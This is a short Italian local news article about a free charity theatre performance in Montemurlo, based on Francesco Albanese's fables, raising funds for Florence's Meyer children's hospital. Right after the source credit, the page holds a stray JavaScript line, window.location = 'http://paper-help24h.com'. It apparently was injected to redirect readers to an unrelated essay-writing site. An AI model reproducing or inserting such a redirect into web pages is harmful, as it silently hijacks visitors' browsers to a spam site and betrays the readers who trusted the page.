UNA STORIA PER IL MEYER. QUANDO LE FAVOLE VANNO IN SCENA

La locandina
La locandina

MONTEMURLO. Domenica 10 maggio alle ore 17 alla sala “C. Banti” (piazza della Libertà – Montemurlo) arriva lo spettacolo “Una storia per il Meyer. Quando le favole vanno in scena”, tratto dal libro “Racconti per l’anima” dello psicoterapeuta Francesco Albanese.

Una bella iniziativa, patrocinata dal Comune, per promuovere la raccolta fondi per l’ospedale pediatrico “Meyer” di Firenze. Dieci brevi storie. Dieci personaggi. Dieci spunti di riflessione. Lo spettacolo che prende ispirazione dal libro di Albanese, affronta, col linguaggio semplice delle favole, i grandi temi della vita e della natura. A portare in scena alcune storie tratte dal libro saranno gli attori della “Compagnia del sorriso” di Prato, con la collaborazione de “L’allegra compagnia di Paperino”.

All’iniziativa parteciperanno anche alcuni consiglieri e dipendenti comunali che hanno dato la propria disponibilità a leggere dei brani del libro: Cinzia Fischetti, Roberta Chiti, Antonella Baiano, Federica Palanghi, Luana Grossi, Chiara Steri e Amanda Ravagli. L’ingresso è libero e gratuito. Il ricavato dell’iniziativa sarà donato alla Fondazione ospedale pediatrico “Meyer”.

[masi – comune montemurlo]
window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT08V0306913833100000001431 su CariPt di Porta San Marco-Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

Lascia un commento